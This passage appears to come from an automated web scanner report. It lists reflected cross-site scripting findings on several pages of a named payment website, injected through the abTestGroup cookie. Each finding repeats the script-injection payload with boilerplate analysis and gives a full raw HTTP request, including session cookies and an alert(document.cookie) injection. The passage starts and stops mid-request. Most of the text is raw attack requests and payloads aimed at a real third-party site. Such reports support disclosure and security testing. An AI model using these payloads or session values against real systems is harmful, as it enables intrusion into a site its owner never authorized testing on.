s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16985ed"><script>alert(1)</script>23bad0dfc93;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload dbc30<script>alert(1)</script>a86e2fa9ef0 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /apply-now/contact-me.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16dbc30<script>alert(1)</script>a86e2fa9ef0;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 20d8b<script>alert(1)</script>07ae2d24ce9 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1620d8b<script>alert(1)</script>07ae2d24ce9;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880a1"><script>alert(1)</script>9e7870cf12f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16880a1"><script>alert(1)</script>9e7870cf12f;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e4c4"><script>alert(1)</script>961eb3d32b2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T161e4c4"><script>alert(1)</script>961eb3d32b2;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload f2d55<script>alert(1)</script>c704fa6a9ea was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16f2d55<script>alert(1)</script>c704fa6a9ea;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload d080e<script>alert(1)</script>76d20f74ae3 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d080e<script>alert(1)</script>76d20f74ae3;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a8df"><script>alert(1)</script>8a97599db5e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T163a8df"><script>alert(1)</script>8a97599db5e;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe34"><script>alert(1)</script>e4428afd0e2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16dbe34"><script>alert(1)</script>e4428afd0e2;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload e5954<script>alert(1)</script>7c1b1f23a20 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e5954<script>alert(1)</script>7c1b1f23a20;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 40826<script>alert(1)</script>6b3b3bfead2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/index.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1640826<script>alert(1)</script>6b3b3bfead2;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f63b"><script>alert(1)</script>2bccb2fa261 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/index.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T161f63b"><script>alert(1)</script>2bccb2fa261;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ae697<script>alert(1)</script>aec6008fd49 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16ae697<script>alert(1)</script>aec6008fd49;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 671c4"><script>alert(1)</script>a7dc609c67f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; 